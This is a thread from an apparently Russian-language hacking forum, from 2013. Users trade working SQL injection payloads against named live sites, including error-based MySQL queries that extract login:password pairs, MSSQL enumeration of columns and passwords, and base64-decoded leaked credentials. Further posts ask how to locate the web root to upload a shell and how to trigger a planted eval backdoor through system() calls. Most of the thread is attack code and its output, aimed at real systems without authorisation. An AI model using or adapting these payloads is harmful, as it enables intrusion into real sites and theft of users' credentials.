Старый 16.02.2013, 17:27   #2711
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Не могу никак добиться вывода в ошибке, все мои варианты испробованы:
Код:
http://regions.ru/section/main_ural'
Буду очень благодарен, если кто поможет.
netcat вне форума   Ответить с цитированием
Старый 16.02.2013, 18:55   #2712
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

http://regions.ru/section/main_ural'or(select+count(*)from(select+1+union+se lect+2+union+select+3)x+group+by+concat(mid((selec t+concat(login,0x3a,password)+from+user+where+id=1 ),1,64),floor(rand(0)*2)))and'1'='1
например так, там символ "_" - разделитель, видимо, на union select 1 - неправильное количество колонок, а на ..select 1,2 - должно содержать одну, ну и пофиг
aka_zver вне форума   Ответить с цитированием
Старый 17.02.2013, 02:19   #2713
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

приветствую
имею скулю бд Mssql

все таблицы вытянул, теперь пытаюсь дернуть колонки:
Цитата:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+use rtable+FROM+INFORMATION_SCHEMA.COLUMNS))+--+
ловлю Invalid column name 'usertable' такая таблица 100про есть, что нитак делаю?
_xhugo вне форума   Ответить с цитированием
Старый 17.02.2013, 09:40   #2714
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

https://rdot.org/forum/showpost.php?p=9722&postcount=11
Pashkela вне форума   Ответить с цитированием
Старый 17.02.2013, 12:55   #2715
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
https://rdot.org/forum/showpost.php?p=9722&postcount=11
вот по аналогии
gMembers=103 77 101 109 98 101 114 115
Код:
(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(103)%2bchar(77)%2bchar(101)%2bchar(109)%2bchar(98)%2bchar(101)%2bchar(114)%2bchar(115)+and+column_name+not+in+(select+top+3+column_name+from+information_schema.columns+where+table_name=char(103)%2bchar(77)%2bchar(101)%2bchar(109)%2bchar(98)%2bchar(101)%2bchar(114)%2bchar(115)+order+by+column_name)+order+by+column_name)a)
ответ:
Incorrect syntax near 'char'.
_xhugo вне форума   Ответить с цитированием
Старый 17.02.2013, 13:07   #2716
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

ну может быть ему %2b не нравится, попробуй просто +

и если там magic_quotes off, то можно просто попробовать написать

+where+table_name='gMembers'

Последний раз редактировалось Pashkela; 17.02.2013 в 13:10..
Pashkela вне форума   Ответить с цитированием
Старый 17.02.2013, 14:11   #2717
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
ну может быть ему %2b не нравится, попробуй просто +

и если там magic_quotes off, то можно просто попробовать написать

+where+table_name='gMembers'
спасибо , получилось.

теперь проблема с выводом таблиц
Код:
(select+top+3+cast(Password+as+binary)+from+gMembers+FOR+XML+PATH(''))+--+"
Conversion failed when converting the nvarchar value 'MTAwMTAwMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMTIzNDU2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3ViaGFzaDgzAAAAAAAAAAAAAAAAAAAAAAAAAAAA' to data type int.
если делать master..fn_varbintohexstr(password)
то ошибка синтаксиса '..'
_xhugo вне форума   Ответить с цитированием
Старый 17.02.2013, 14:13   #2718
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Conversion failed when converting the nvarchar value 'MTAwMTAwMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMTIzNDU2A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3ViaGFzaDgzAAAAAAA AAAAAAAAAAAAAAAAAAAAA' to data type int.
base64_decode:

1001001123456subhash83

хз что у тебя короче
Pashkela вне форума   Ответить с цитированием
Старый 18.02.2013, 00:31   #2719
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

разобрался
Цитата:
$k=table
sid=1111111'+OR+1=(SELECT+CONVERT(int,SUBSTRING((S ELECT+*+FROM+(SELECT+ROW_NUMBER()+OVER+(ORDER+BY+i d+DESC)+AS+rownum,alert_Email,alert_pwd+AS+data+FR OM+$k)+AS+t+WHERE+t.rownum+BETWEEN+$i+AND+$i+FOR+X ML+RAW+('a')),0,1990)))+--+
а вот как получить полный адрес до сайта\папки в mssql
хочу бекапнуть все или залить шелл, но нужен полный адрес допустим c:\papka\site\blabla ну вы поняли

--
select+top+1+physical_name+from+sys.database_files
F:\sqlprod\Data\hsname.mdf'

могу туда дамп\шелл сделать, но не как потом запустить..?

Последний раз редактировалось _xhugo; 18.02.2013 в 01:59..
_xhugo вне форума   Ответить с цитированием
Старый 18.02.2013, 15:01   #2720
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

В качестве бэкдора был оставлен eval. Теперь, когда он понадобился, не могу нормально сработать.
Работает:
Код:
system(ls);
system(base64_decode(J2xzJwoK));
Если кавычки ставлю без base64 - не работает
Код:
system('ls');
Также не работают команды:
Код:
system('ls -al');
system(base64_decode(J2xzIC1hbCc));
system(base64_decode(KCdscyAvZGF0YS9zaXRlcy93d3cuc2l0ZS5jb20vaHRkb2NzJyk));
MQ off, disable_functions - none, allow_url_fopen - On
Бэкдор использует $_REQUEST[], поэтому пробовал и гет, и пост методы - реакция одинакова.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 18.02.2013 в 15:03..
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot